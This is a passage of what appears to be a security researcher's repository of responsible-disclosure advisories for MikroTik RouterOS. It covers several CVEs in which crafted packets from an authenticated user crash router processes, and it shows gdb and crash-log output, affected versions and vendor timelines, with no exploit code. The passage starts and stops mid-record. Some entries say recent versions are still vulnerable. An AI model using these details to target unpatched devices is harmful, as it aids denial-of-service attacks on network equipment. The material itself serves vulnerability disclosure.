| Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x8050e33: or ecx,DWORD PTR [eax+0xc] 15 | 0x8050e36: mov edx,edi 16 | 0x8050e38: mov eax,ebx 17 | 0x8050e3a: call 0x804ffbc 18 | 0x08050e33 in ?? () 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0xff0000 16711680 22 | edx 0x8059678 134583928 23 | ebx 0x7f85c090 2139472016 24 | esp 0x7f85c080 0x7f85c080 25 | ebp 0x7f85c0c8 0x7f85c0c8 26 | esi 0x7f85c094 2139472020 27 | edi 0x8057a24 134576676 28 | eip 0x8050e33 0x8050e33 29 | eflags 0x10206 [ PF IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 195 target:/nova/bin/sniffer 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.19-16:36:18.33@0: 46 | 2020.06.19-16:36:18.33@0: 47 | 2020.06.19-16:36:18.33@0: /nova/bin/sniffer 48 | 2020.06.19-16:36:18.33@0: --- signal=11 -------------------------------------------- 49 | 2020.06.19-16:36:18.33@0: 50 | 2020.06.19-16:36:18.33@0: eip=0x08050e33 eflags=0x00010206 51 | 2020.06.19-16:36:18.33@0: edi=0x08057a24 esi=0x7f85c094 ebp=0x7f85c0c8 esp=0x7f85c080 52 | 2020.06.19-16:36:18.33@0: eax=0x00000000 ebx=0x7f85c090 ecx=0x00ff0000 edx=0x08059678 53 | 2020.06.19-16:36:18.33@0: 54 | 2020.06.19-16:36:18.33@0: maps: 55 | 2020.06.19-16:36:18.33@0: 08048000-08056000 r-xp 00000000 00:0c 1034 /nova/bin/sniffer 56 | 2020.06.19-16:36:18.33@0: 776ce000-77703000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.19-16:36:18.33@0: 77707000-77721000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.19-16:36:18.33@0: 77722000-77731000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.19-16:36:18.33@0: 77732000-7773a000 r-xp 00000000 00:0c 950 /lib/libubox.so 60 | 2020.06.19-16:36:18.33@0: 7773b000-77787000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.06.19-16:36:18.33@0: 7778d000-77794000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.06.19-16:36:18.33@0: 63 | 2020.06.19-16:36:18.33@0: stack: 0x7f85d000 - 0x7f85c080 64 | 2020.06.19-16:36:18.33@0: 2c 08 07 08 04 00 fe 08 fe 00 00 00 20 ad 05 08 00 0c 07 08 a0 0b 07 08 af 0b 07 08 04 7a 05 08 65 | 2020.06.19-16:36:18.33@0: 08 00 00 00 24 7a 05 08 ff 00 00 00 00 00 00 00 08 c2 85 7f e4 7a 78 77 d8 c0 85 7f e4 7a 78 77 66 | 2020.06.19-16:36:18.34@0: 67 | 2020.06.19-16:36:18.34@0: code: 0x8050e33 68 | 2020.06.19-16:36:18.34@0: 0b 48 0c 89 fa 89 d8 e8 7d f1 ff ff 50 50 53 56 69 | ``` 70 | 71 | #### Affected Version 72 | 73 | This vulnerability was initially found in long-term `6.44.6`, and it seems that the latest stable version `6.48.2` still suffers from this vulnerability. 74 | 75 | #### Timeline 76 | 77 | + 2020/01/06 - report the vulnerability to the vendor 78 | + 2020/01/07 - vendor confirms the vulnerability and will work on a fix 79 | + 2021/05/04 - CVE is assigned 80 | 81 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20225/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20225 2 | 3 | #### Description 4 | 5 | The `user` process suffers from an assertion failure vulnerability. There is a reachable assertion in the `user` process. By sending a crafted packet, an authenticated remote user can crash the `user` process due to assertion failure. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGABRT, Aborted. 14 | => 0x7765a55b : pop ebx 15 | 0x7765a55c : cmp eax,0xfffff000 16 | 0x7765a561 : jbe 0x7765a571 17 | 0x7765a563 : mov edx,DWORD PTR [ebx-0x34] 18 | 0x7765a55b in raise () from target:/lib/libc.so.0 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0xb4 180 22 | edx 0x6 6 23 | ebx 0xb4 180 24 | esp 0x7fee3788 0x7fee3788 25 | ebp 0x7fee3790 0x7fee3790 26 | esi 0x77662200 2003182080 27 | edi 0xfe0001 16646145 28 | eip 0x7765a55b 0x7765a55b 29 | eflags 0x246 [ PF ZF IF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 180 target:/nova/bin/user 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-17:56:52.31@0: 46 | 2020.06.04-17:56:52.31@0: 47 | 2020.06.04-17:56:52.31@0: /nova/bin/user 48 | 2020.06.04-17:56:52.31@0: --- signal=6 -------------------------------------------- 49 | 2020.06.04-17:56:52.31@0: 50 | 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x00000246 51 | 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790 esp=0x7fee3788 52 | 2020.06.04-17:56:52.31@0: eax=0x00000000 ebx=0x000000b4 ecx=0x000000b4 edx=0x00000006 53 | 2020.06.04-17:56:52.31@0: 54 | 2020.06.04-17:56:52.31@0: maps: 55 | 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00000000 00:0c 1002 /nova/bin/user 56 | 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.04-17:56:52.31@0: 77680000-7768f000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.04-17:56:52.31@0: 77690000-776ad000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 60 | 2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp 00000000 00:0c 951 /lib/liburadius.so 61 | 2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp 00000000 00:0c 950 /lib/libubox.so 62 | 2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp 00000000 00:0c 948 /lib/libuxml++.so 63 | 2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp 00000000 00:0c 946 /lib/libumsg.so 64 | 2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 65 | 2020.06.04-17:56:52.31@0: 66 | 2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788 67 | 2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65 77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00 68 | 2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70 77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00 69 | 2020.06.04-17:56:52.31@0: 70 | 2020.06.04-17:56:52.31@0: code: 0x7765a55b 71 | 2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 72 | ``` 73 | 74 | #### Affected Version 75 | 76 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 77 | 78 | #### Timeline 79 | 80 | + 2020/02/15 - report the vulnerability to the vendor 81 | + 2020/06/02 - vendor fix it in stable `6.47` 82 | + 2021/05/04 - CVE is assigned -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20227/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20227 2 | 3 | #### Description 4 | 5 | The `diskd` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `diskd` process due to invalid memory access. 6 | 7 | Against stable `6.47`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x7775a1e3 <_ZN6string6assignERKS_+21>: mov eax,DWORD PTR [eax] 15 | 0x7775a1e5 <_ZN6string6assignERKS_+23>: mov edx,DWORD PTR [eax] 16 | 0x7775a1e7 <_ZN6string6assignERKS_+25>: add edx,eax 17 | 0x7775a1e9 <_ZN6string6assignERKS_+27>: add edx,0x4 18 | 0x7775a1e3 in string::assign(string const&) () from target:/lib/libuc++.so 19 | (gdb) i r 20 | eax 0xa 10 21 | ecx 0x8054600 134563328 22 | edx 0x8056e18 134573592 23 | ebx 0x777624ec 2004231404 24 | esp 0x7f9dceac 0x7f9dceac 25 | ebp 0x7f9dceb8 0x7f9dceb8 26 | esi 0xa 10 27 | edi 0x7f9dd024 2141048868 28 | eip 0x7775a1e3 0x7775a1e3 29 | eflags 0x10202 [ IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 119 target:/nova/bin/diskd 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.05-15:00:38.33@0: 46 | 2020.06.05-15:00:38.33@0: 47 | 2020.06.05-15:00:38.33@0: /nova/bin/diskd 48 | 2020.06.05-15:00:38.33@0: --- signal=11 -------------------------------------------- 49 | 2020.06.05-15:00:38.33@0: 50 | 2020.06.05-15:00:38.33@0: eip=0x7775a1e3 eflags=0x00010202 51 | 2020.06.05-15:00:38.33@0: edi=0x7f9dd024 esi=0x0000000a ebp=0x7f9dceb8 esp=0x7f9dceac 52 | 2020.06.05-15:00:38.33@0: eax=0x0000000a ebx=0x777624ec ecx=0x08054600 edx=0x08056e18 53 | 2020.06.05-15:00:38.33@0: 54 | 2020.06.05-15:00:38.33@0: maps: 55 | 2020.06.05-15:00:38.33@0: 08048000-08052000 r-xp 00000000 00:0c 1049 /nova/bin/diskd 56 | 2020.06.05-15:00:38.33@0: 776ff000-77734000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.05-15:00:38.33@0: 77738000-77752000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 58 | 2020.06.05-15:00:38.33@0: 77753000-77762000 r-xp 00000000 00:0c 945 /lib/libuc++.so 59 | 2020.06.05-15:00:38.33@0: 77763000-7776b000 r-xp 00000000 00:0c 951 /lib/libubox.so 60 | 2020.06.05-15:00:38.33@0: 7776c000-777b8000 r-xp 00000000 00:0c 947 /lib/libumsg.so 61 | 2020.06.05-15:00:38.33@0: 777be000-777c5000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.06.05-15:00:38.33@0: 63 | 2020.06.05-15:00:38.33@0: stack: 0x7f9de000 - 0x7f9dceac 64 | 2020.06.05-15:00:38.33@0: f4 8a 7b 77 0a 00 00 00 f4 8a 7b 77 e8 ce 9d 7f 92 be 78 77 f8 45 05 08 0a 00 00 00 18 6e 05 08 65 | 2020.06.05-15:00:38.33@0: 18 6e 05 08 e4 ce 9d 7f 24 d0 9d 7f 7c 18 76 77 24 d0 9d 7f 18 69 05 08 40 cf 9d 7f a8 cf 9d 7f 66 | 2020.06.05-15:00:38.34@0: 67 | 2020.06.05-15:00:38.34@0: code: 0x7775a1e3 68 | 2020.06.05-15:00:38.34@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 69 | ``` 70 | 71 | #### Affected Version 72 | 73 | This vulnerability was initially found in stable `6.47`, and it was fixed at least in stable `6.48.1`. 74 | 75 | #### Timeline 76 | 77 | + 2020/08/04 - report the vulnerability to the vendor 78 | + 2020/08/05 - vendor require more information to re-compile the provided poc source file 79 | + 2020/08/05 - provide the cmake file to vendor 80 | + 2020/08/06 - vendor repeat and confirm the vulnerability 81 | + 2021/03/01 - re-test against stable `6.48.1`, and it was fixed in this version (no response from the vendor indicating if this vulnerability has been fixed, and in which version it was fixed) 82 | + 2021/05/04 - CVE is assigned 83 | 84 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20230/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20230 2 | 3 | #### Description 4 | 5 | The `sshd` process suffers from an uncontrolled resource consumption vulnerability. By sending a crafted packet, an authenticated remote user can cause a high cpu load, which may make the device respond slowly or unable to respond. 6 | 7 | When testing the proof of concept on an x86 RouterOS VM, this vulnerability will consume all the memory, thus causing the whole system to reboot finally. 8 | 9 | Against stable `6.46.3`, the poc resulted in the high cpu load on the device. 10 | 11 | ![sshd_high_cpu_load](./images/sshd_high_cpu_load.png) 12 | 13 | #### Affected Version 14 | 15 | This vulnerability was initially found in stable `6.46.3`, and was fixed in stable `6.47`. 16 | 17 | #### Timeline 18 | 19 | + 2020/04/08 - reported the vulnerability to the vendor 20 | + 2020/04/09 - vendor reproduced and confirmed the vulnerability 21 | + 2020/04/23 - vendor responded that "it has been fixed and will be added to the next public Beta release" 22 | + 2021/05/04 - CVE was assigned 23 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20230/images/sshd_high_cpu_load.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/advisory/MikroTik/CVE-2020-20230/images/sshd_high_cpu_load.png -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20231/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20231 2 | 3 | #### Description 4 | 5 | The `detnet` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `detnet` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash dump. 8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2020.06.22-16:22:09.85@0: 12 | 2020.06.22-16:22:09.85@0: 13 | 2020.06.22-16:22:09.85@0: /nova/bin/detnet 14 | 2020.06.22-16:22:09.85@0: --- signal=11 -------------------------------------------- 15 | 2020.06.22-16:22:09.85@0: 16 | 2020.06.22-16:22:09.85@0: eip=0x776d86da eflags=0x00010216 17 | 2020.06.22-16:22:09.85@0: edi=0x7fe6cea4 esi=0x7fe6ce0c ebp=0x7fe6cda8 esp=0x7fe6cda0 18 | 2020.06.22-16:22:09.85@0: eax=0x00000020 ebx=0x77707ae4 ecx=0x0805d898 edx=0x7fe6cddc 19 | 2020.06.22-16:22:09.85@0: 20 | 2020.06.22-16:22:09.85@0: maps: 21 | 2020.06.22-16:22:09.85@0: 08048000-08058000 r-xp 00000000 00:0c 1062 /nova/bin/detnet 22 | 2020.06.22-16:22:09.85@0: 77630000-77665000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 23 | 2020.06.22-16:22:09.85@0: 77669000-77683000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 24 | 2020.06.22-16:22:09.85@0: 77684000-77693000 r-xp 00000000 00:0c 944 /lib/libuc++.so 25 | 2020.06.22-16:22:09.85@0: 77694000-776b1000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 26 | 2020.06.22-16:22:09.85@0: 776b2000-776ba000 r-xp 00000000 00:0c 950 /lib/libubox.so 27 | 2020.06.22-16:22:09.85@0: 776bb000-77707000 r-xp 00000000 00:0c 946 /lib/libumsg.so 28 | 2020.06.22-16:22:09.85@0: 7770d000-77714000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 29 | 2020.06.22-16:22:09.85@0: 30 | 2020.06.22-16:22:09.85@0: stack: 0x7fe6d000 - 0x7fe6cda0 31 | 2020.06.22-16:22:09.85@0: 20 00 00 00 dc cd e6 7f f8 cd e6 7f 32 ff 04 08 dc cd e6 7f 20 00 00 00 00 00 00 00 64 a9 6d 77 32 | 2020.06.22-16:22:09.85@0: 9c d5 05 08 98 d8 05 08 e8 cd e6 7f 44 ad 6d 77 a4 ce e6 7f 02 00 00 08 f8 cd e6 7f 1c ad 6d 77 33 | 2020.06.22-16:22:09.85@0: 34 | 2020.06.22-16:22:09.85@0: code: 0x776d86da 35 | 2020.06.22-16:22:09.85@0: 8b 00 89 02 3b 83 34 ff ff ff 74 03 ff 40 24 80 36 | ``` 37 | 38 | #### Affected Version 39 | 40 | This vulnerability was initially found in long-term `6.44.6`, and it seems that the latest stable version `6.48.3` still suffers from this vulnerability. 41 | 42 | #### Timeline 43 | 44 | + 2020/04/20 - reported the vulnerability to the vendor 45 | + 2020/04/23 - the vendor confirmed the vulnerability and will work on them 46 | + 2021/05/04 - CVE was assigned 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20236/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20236 2 | 3 | #### Description 4 | 5 | The `sniffer` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `sniffer` process due to invalid memory access. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash dump. 8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2020.06.19-16:58:33.42@0: 12 | 2020.06.19-16:58:33.42@0: 13 | 2020.06.19-16:58:33.42@0: /nova/bin/sniffer 14 | 2020.06.19-16:58:33.42@0: --- signal=11 -------------------------------------------- 15 | 2020.06.19-16:58:33.42@0: 16 | 2020.06.19-16:58:33.42@0: eip=0x08050dac eflags=0x00010202 17 | 2020.06.19-16:58:33.42@0: edi=0x08057a24 esi=0x00000001 ebp=0x7f8df428 esp=0x7f8df3e0 18 | 2020.06.19-16:58:33.42@0: eax=0x08073714 ebx=0x08073710 ecx=0x08073704 edx=0x08073714 19 | 2020.06.19-16:58:33.42@0: 20 | 2020.06.19-16:58:33.42@0: maps: 21 | 2020.06.19-16:58:33.42@0: 08048000-08056000 r-xp 00000000 00:0c 1034 /nova/bin/sniffer 22 | 2020.06.19-16:58:33.42@0: 77730000-77765000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 23 | 2020.06.19-16:58:33.42@0: 77769000-77783000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 24 | 2020.06.19-16:58:33.42@0: 77784000-77793000 r-xp 00000000 00:0c 944 /lib/libuc++.so 25 | 2020.06.19-16:58:33.42@0: 77794000-7779c000 r-xp 00000000 00:0c 950 /lib/libubox.so 26 | 2020.06.19-16:58:33.42@0: 7779d000-777e9000 r-xp 00000000 00:0c 946 /lib/libumsg.so 27 | 2020.06.19-16:58:33.43@0: 777ef000-777f6000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 28 | 2020.06.19-16:58:33.43@0: 29 | 2020.06.19-16:58:33.43@0: stack: 0x7f8e0000 - 0x7f8df3e0 30 | 2020.06.19-16:58:33.43@0: 3c ab 05 08 04 00 fe 08 e0 0f 00 00 14 37 07 08 24 7a 05 08 00 00 00 00 18 f4 8d 7f 04 7a 05 08 31 | 2020.06.19-16:58:33.43@0: 08 00 00 00 24 7a 05 08 04 00 00 00 00 00 00 00 70 4a 7a 77 e4 9a 7e 77 38 f4 8d 7f e4 9a 7e 77 32 | 2020.06.19-16:58:33.43@0: 33 | 2020.06.19-16:58:33.43@0: code: 0x8050dac 34 | 2020.06.19-16:58:33.43@0: 8b 43 04 83 e0 fc 85 c0 74 1c 8b 4b 14 39 34 08 35 | ``` 36 | 37 | #### Affected Version 38 | 39 | This vulnerability was initially found in stable `6.46.3`, and it seems that the latest version stable `6.48.2` still suffers from this vulnerability. 40 | 41 | #### Timeline 42 | 43 | + 2020/02/26 - report the vulnerability to the vendor 44 | + 2020/02/27 - vendor confirms the vulnerability and will work on a fix 45 | + 2021/05/04 - CVE is assigned 46 | 47 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20237/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20237 2 | 3 | #### Description 4 | 5 | The `sniffer` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `sniffer` process due to invalid memory access. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash dump. 8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2020.06.19-17:58:43.98@0: 12 | 2020.06.19-17:58:43.98@0: 13 | 2020.06.19-17:58:43.98@0: /nova/bin/sniffer 14 | 2020.06.19-17:58:43.98@0: --- signal=11 -------------------------------------------- 15 | 2020.06.19-17:58:43.98@0: 16 | 2020.06.19-17:58:43.98@0: eip=0x77712055 eflags=0x00010202 17 | 2020.06.19-17:58:43.98@0: edi=0x77720f34 esi=0x77721015 ebp=0x7ff96b38 esp=0x7ff96af8 18 | 2020.06.19-17:58:43.98@0: eax=0x77721054 ebx=0x7771f000 ecx=0x77721034 edx=0x77721014 19 | 2020.06.19-17:58:43.98@0: 20 | 2020.06.19-17:58:43.98@0: maps: 21 | 2020.06.19-17:58:43.98@0: 08048000-08056000 r-xp 00000000 00:0c 1034 /nova/bin/sniffer 22 | 2020.06.19-17:58:43.98@0: 776e9000-7771e000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 23 | 2020.06.19-17:58:43.98@0: 77722000-7773c000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 24 | 2020.06.19-17:58:43.98@0: 7773d000-7774c000 r-xp 00000000 00:0c 944 /lib/libuc++.so 25 | 2020.06.19-17:58:43.98@0: 7774d000-77755000 r-xp 00000000 00:0c 950 /lib/libubox.so 26 | 2020.06.19-17:58:43.98@0: 77756000-777a2000 r-xp 00000000 00:0c 946 /lib/libumsg.so 27 | 2020.06.19-17:58:43.98@0: 777a8000-777af000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 28 | 2020.06.19-17:58:43.98@0: 29 | 2020.06.19-17:58:43.98@0: stack: 0x7ff97000 - 0x7ff96af8 30 | 2020.06.19-17:58:43.98@0: 00 f0 71 77 00 0f 72 77 30 00 00 00 00 00 00 00 38 b2 05 08 34 0f 72 77 04 00 00 00 00 0f 72 77 31 | 2020.06.19-17:58:43.98@0: 20 00 00 00 1b 7b 71 77 e8 f1 71 77 98 00 00 00 01 00 00 00 ec c4 74 77 74 a1 05 08 f8 6b f9 7f 32 | 2020.06.19-17:58:43.98@0: 33 | 2020.06.19-17:58:43.98@0: code: 0x77712055 34 | 2020.06.19-17:58:43.98@0: 89 14 10 eb bc 8b 93 a4 ff ff ff 8b 7d e0 8b 42 35 | ``` 36 | 37 | Interestingly, the same poc resulted in another different crash dump(`SIGABRT`) against stable `6.48.2`. 38 | 39 | ```shell 40 | # cat /rw/logs/backtrace.log 41 | 2021.05.07-16:02:37.25@0: 42 | 2021.05.07-16:02:37.25@0: 43 | 2021.05.07-16:02:37.25@0: /nova/bin/sniffer 44 | 2021.05.07-16:02:37.25@0: --- signal=6 -------------------------------------------- 45 | 2021.05.07-16:02:37.25@0: 46 | 2021.05.07-16:02:37.25@0: eip=0x776f255b eflags=0x00000246 47 | 2021.05.07-16:02:37.25@0: edi=0x0805aca8 esi=0x776fa200 ebp=0x7f97def8 esp=0x7f97def0 48 | 2021.05.07-16:02:37.25@0: eax=0x00000000 ebx=0x000000b6 ecx=0x000000b6 edx=0x00000006 49 | 2021.05.07-16:02:37.25@0: 50 | 2021.05.07-16:02:37.25@0: maps: 51 | 2021.05.07-16:02:37.25@0: 08048000-08056000 r-xp 00000000 00:0c 1036 /nova/bin/sniffer 52 | 2021.05.07-16:02:37.25@0: 776c4000-776f9000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 53 | 2021.05.07-16:02:37.25@0: 776fd000-77717000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 54 | 2021.05.07-16:02:37.25@0: 77718000-77727000 r-xp 00000000 00:0c 945 /lib/libuc++.so 55 | 2021.05.07-16:02:37.25@0: 77728000-77730000 r-xp 00000000 00:0c 951 /lib/libubox.so 56 | 2021.05.07-16:02:37.25@0: 77731000-7777d000 r-xp 00000000 00:0c 947 /lib/libumsg.so 57 | 2021.05.07-16:02:37.25@0: 77783000-7778a000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 58 | 2021.05.07-16:02:37.25@0: 59 | 2021.05.07-16:02:37.25@0: stack: 0x7f97f000 - 0x7f97def0 60 | 2021.05.07-16:02:37.25@0: 00 a0 6f 77 00 a0 6f 77 30 df 97 7f 77 e0 6e 77 06 00 00 00 00 a2 6f 77 20 00 00 00 00 00 00 00 61 | 2021.05.07-16:02:37.25@0: 26 2b 6f 77 00 a0 6f 77 28 df 97 7f 21 2c 6f 77 e8 a1 6f 77 00 a0 6f 77 00 bf 6f 77 a8 ac 05 08 62 | 2021.05.07-16:02:37.25@0: 63 | 2021.05.07-16:02:37.25@0: code: 0x776f255b 64 | 2021.05.07-16:02:37.25@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 65 | ``` 66 | 67 | #### Affected Version 68 | 69 | This vulnerability was initially found in stable `6.46.3`, and it seems that the latest stable version `6.48.2` suffers from an assertion failure vulnerability when running the same poc. 70 | 71 | #### Timeline 72 | 73 | + 2020/02/26 - report the vulnerability to the vendor 74 | + 2020/02/27 - vendor confirms the vulnerability and will work on a fix 75 | + 2021/05/04 - CVE is assigned 76 | 77 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20245/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20245 2 | 3 | #### Description 4 | 5 | The `log` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `log` process due to invalid memory access. 6 | 7 | Against stable `6.47`, the poc resulted in the following crash dump. 8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2020.06.22-20:13:36.29@0: 12 | 2020.06.22-20:13:36.29@0: 13 | 2020.06.22-20:13:36.62@0: /nova/bin/log 14 | 2020.06.22-20:13:36.62@0: --- signal=11 -------------------------------------------- 15 | 2020.06.22-20:13:36.62@0: 16 | 2020.06.22-20:13:36.62@0: eip=0x77709d2e eflags=0x00010202 17 | 2020.06.22-20:13:36.62@0: edi=0x0000004b esi=0x77718f00 ebp=0x7fec6858 esp=0x7fec6818 18 | 2020.06.22-20:13:36.62@0: eax=0x00000031 ebx=0x77717000 ecx=0x777171e8 edx=0x00000006 19 | 2020.06.22-20:13:36.62@0: 20 | 2020.06.22-20:13:36.62@0: maps: 21 | 2020.06.22-20:13:36.62@0: 08048000-08058000 r-xp 00000000 00:0c 1005 /nova/bin/log 22 | 2020.06.22-20:13:36.62@0: 776e1000-77716000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 23 | 2020.06.22-20:13:36.62@0: 7771a000-77734000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 24 | 2020.06.22-20:13:36.62@0: 77735000-77744000 r-xp 00000000 00:0c 945 /lib/libuc++.so 25 | 2020.06.22-20:13:36.62@0: 77745000-77791000 r-xp 00000000 00:0c 947 /lib/libumsg.so 26 | 2020.06.22-20:13:36.62@0: 77797000-7779e000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 27 | 2020.06.22-20:13:36.62@0: 28 | 2020.06.22-20:13:36.62@0: stack: 0x7fec7000 - 0x7fec6818 29 | 2020.06.22-20:13:36.62@0: 48 68 ec 7f 7b ce 73 77 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 68 ec 7f 21 ac 70 77 30 | 2020.06.22-20:13:36.62@0: 40 00 00 00 1b fb 70 77 e8 71 71 77 c0 28 06 08 88 68 ec 7f ec 44 74 77 e4 29 06 08 40 69 ec 7f 31 | 2020.06.22-20:13:36.62@0: 32 | 2020.06.22-20:13:36.62@0: code: 0x77709d2e 33 | 2020.06.22-20:13:36.62@0: 8b 48 08 89 4c 96 04 e9 93 05 00 00 81 7d e0 ff 34 | ``` 35 | 36 | #### Affected Version 37 | 38 | This vulnerability was initially found in stable `6.46.3`, and it seems that the latest stable version `6.48.2` still suffers from this vulnerability. 39 | 40 | #### Timeline 41 | 42 | + 2020/03/06 - report the vulnerability to the vendor 43 | + 2020/03/09 - vendor confirms the vulnerability 44 | + 2021/05/04 - CVE is assigned -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20246/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20246 2 | 3 | #### Description 4 | 5 | The `mactel` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `mactel` process due to NULL pointer dereference. 6 | 7 | Against stable `6.47`, the poc resulted in the following crash dump. 8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2020.06.22-20:25:36.17@0: 12 | 2020.06.22-20:25:36.17@0: 13 | 2020.06.22-20:25:36.17@0: /nova/bin/mactel 14 | 2020.06.22-20:25:36.17@0: --- signal=11 -------------------------------------------- 15 | 2020.06.22-20:25:36.17@0: 16 | 2020.06.22-20:25:36.17@0: eip=0x0804ddc7 eflags=0x00010202 17 | 2020.06.22-20:25:36.17@0: edi=0x08055740 